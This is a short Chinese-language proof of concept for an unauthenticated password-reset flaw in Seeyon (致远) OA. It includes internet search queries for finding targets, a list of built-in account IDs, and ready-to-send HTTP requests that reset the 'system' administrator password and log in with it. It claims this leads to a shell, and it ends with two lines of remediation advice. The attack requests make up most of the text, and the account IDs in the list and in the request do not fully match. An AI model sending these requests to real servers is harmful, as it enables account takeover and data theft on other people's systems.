描述

击者在知道用户名的情况下,可以构造特殊的请求包,从而修改系统管理用密码,登录系统后台,获取敏感数据进行任意管理员操作等,使用重置后的密码通过接口获取cookie后可getshell

查询语法

hunter:app.name="致远 OA"fofa:app="致远A8"

用户及对应ID

seeyon-guest -696400025239268-----忽略
system -72730320132347481---忽略
audit-admin -440160666363------忽略
group-admin 5725175934914479521

漏洞验证

1、重置密码验证当前登录用户

PUT /seeyon/rest/orgMember/-7273032013234748168/password/genericController.do HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=
Connection: close

2、登录验证

POST /seeyon/rest/authentication/ucpcLogin?login_username=system&login_password=genericController.do&ticket= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=
Connection: close

3、使用重置后的密码登录(system/genericController.do)其他用户重置类似

修复建议

1、禁用系统敏感接口对外访问。

2、及时升级产品到最新版本。